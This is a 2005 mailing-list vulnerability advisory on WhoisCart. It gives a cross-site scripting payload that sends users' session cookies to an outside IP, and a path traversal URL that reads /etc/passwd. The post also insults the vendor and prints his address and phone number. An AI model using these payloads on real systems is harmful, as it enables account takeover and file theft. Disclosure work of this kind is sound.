Subject: Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in that it allows an attacker to insert Javascript into user viewed pages, and also to view any world readable file on the server hosting the WhoisCart software. Severity: Severe; These vulnerabilities can allow an attacker to access literally access any part of a system, as plaintext database passwords can be read from the WhoisCart configuration, or users' session ID cookies stolen, and used to access user accounts. Preamble: (Taken from http://www.whoiscart.net/) Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and domains shopping cart and billing management system that will most likely be your best friend during your domain hosting and registration business venture. Easily skinned using our versatile theme architecture, with support for over a dozen payment portals, fourteen different languages, and capable of all billing recurrences; the system is quickly becoming the most popular and highest rated script in its class [1]. Coded entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in Zend's Top 10, and by far the most feature packed software for its price - come and see why exactly 3155 users just can't be wrong. Problem: The first vulnerability, involving Javascript injection, and ultimately session ID extraction, is exploited by utilizing an unsecured user input field. http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE Basically, url encode some Javascript, like so:
turns into: %3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E Then that url encoded Javascript is inserted at the appropriate location above. Next Problem: The next vulnerability involves the plain-text printing of any world readable file on the system (including any and all configuration files used to run WhoisCart, store session IDs, store plaintext database passwords, etc.). http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00 There you have the ability to read any world readable file on the server. The %00 is to append a null character, as to avoid getting something like /etc/passwd.php. Workaround: Use different software, not written by a 12 year old (no offense to any kids reading this, but think about security, for once). The vulnerabilities shown here are indicative of a truly inferior software product. The product is not even feature complete. The beta that's been in progress for 2 years, can be seen at http://beta.whoiscart.net/admin/, barely started. Vulnerabilities like this still exist, and have existed throughout the software since its inception. The only fix for this is for Saeven.net to release a new product, rewritten from the ground up, or for the consumer to choose a new product altogether (yes, there are better ones on the market for the same price, try Google). If a software allows the unauthorized viewing of globally readable files, the software has already failed, and deserves to be shot down such as this. Vendor Contact: saeven.net consulting Alexandre Lemaire (registrations@saeven.net) 1968 Portobello blvd Orleans Ontario,K4A 4E0 CA Tel. +91.226370256 (If you call, careful you don't get his mom) Disclosure Timeline: Vendor Notified: June 21, 2005 Public Release: June 22, 2005 About the Author: The author is a software engineer, with an absolute detest for bullshit. Sometimes I detest some languages, because they allow punks like this to write shit software, and then the dumbass programmer puts up a website, uses the word "innovative", and ends up ultimately screwing over a few hundred people, who maintain the personal information of thousands of people. Identity theft starts with "companies" such as this. Choose a trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP, does NOT make something trustworthy. A company with a non-ficticious in-house lawyer is a good start, and then a company who knows what the fuck they're doing when it comes to software design and implementation is stellar. It is this type of bullshit I detest, and I advise everyone against using this product, for numerous reasons, all founding from the same core element: a product is not to be trusted because of a flashy website, or because some kid lies about his age. Conclusion: Here is an email, verbatim from Mr. Lemaire: From: "S. Alexandre M. Lemaire" I'll indulge your comments. The truth is that I don't maintain the work on whois.cart currently. I have a staff of 13 people working for me right now, the developments are intense and I don't have the time to monitor them as I usually would. They package and operate independently from myself. My user community knows well (as I post frequent updates in the forums) that I'm currently vested into our other project, our helpdesk. We have a user base of 3000+, you aren't the only one to submit bug reports - note also that the people that work for me, aren't bored teenagers. They are people with M.Scs and PhDs in computer science and related fields, who've agreed to partake in the whois.cart project on their spare time initially. Your concern for security, is not exclusive. Show me a person with a Masters or PHd in Computer Science that both works in the webhosting software industry and writes shit software like this, and I will show you shit that smells like roses. -- _______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/